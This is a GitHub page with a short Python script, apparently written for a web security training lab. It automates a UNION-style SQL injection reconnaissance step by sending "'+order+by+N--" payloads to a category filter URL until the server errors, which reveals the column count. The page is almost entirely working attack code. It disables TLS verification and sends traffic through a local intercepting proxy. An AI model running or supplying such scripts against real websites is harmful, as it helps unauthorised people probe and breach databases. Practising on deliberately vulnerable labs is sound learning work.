-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlab-3.py
42 lines (36 loc) · 1.49 KB
/
lab-3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import pyfiglet
# Display a banner using pyfiglet
ascii_banner = pyfiglet.figlet_format("RuhanSec")
print(ascii_banner)
proxies = {'http': 'http://127.0.0.1:8080'}
def exploit_sqli_column_number(url):
path = "filter?category=Gifts"
for i in range(1,50):
sql_payload = "'+order+by+%s--" %i
r = requests.get(url + path + sql_payload, verify=False, proxies=proxies)
res = r.text
if "Internal Server Error" in res:
return i - 1
return False
'''Certainly! The `return False` statement in the `exploit_sqli_column_number` function is used
to indicate that the SQL injection attack to determine the number of
columns was unsuccessful. When the condition for "Internal Server Error" is not met
during the loop, it means the current attempt did not reveal the correct number
of columns, and `False` is returned to signal this failure to the calling code.'''
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
except IndexError:
print("[-] Usage: %s <url>" % sys.argv[0])
print("[-] Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
print("[+] Figuring out number of columns...")
num_col = exploit_sqli_column_number(url)
if num_col:
print("[+] The number of columns is " + str(num_col) + "." )
else:
print("[-] The SQLi attack was not successful.")